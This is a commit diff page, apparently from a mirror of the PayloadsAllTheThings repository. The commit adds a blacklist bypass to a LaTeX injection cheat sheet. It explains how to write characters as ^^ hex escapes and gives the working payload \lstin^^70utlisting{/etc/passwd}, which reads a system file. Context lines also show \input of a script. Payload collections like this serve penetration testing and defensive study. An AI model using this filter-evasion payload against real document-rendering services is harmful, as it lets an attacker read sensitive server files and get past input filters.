mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
latex injection add blacklist bypass
This commit is contained in:
parent
d80068cc1b
commit
ae3f91c88a
1 changed files with 8 additions and 0 deletions
|
@ -53,6 +53,14 @@ characters can be deactivated in order to use `\input` on file containing `$`, `
|
|||
\input{path_to_script.pl}
|
||||
```
|
||||
|
||||
To bypass a blacklist try to replace one character with it's unicode hex value.
|
||||
- ^^41 represents a capital A
|
||||
- ^^7e represents a tilde (~) note that the ‘e’ must be lower case
|
||||
|
||||
```tex
|
||||
\lstin^^70utlisting{/etc/passwd}
|
||||
```
|
||||
|
||||
## Write file
|
||||
|
||||
Write single lined file:
|
||||
|
|
Loading…
Reference in a new issue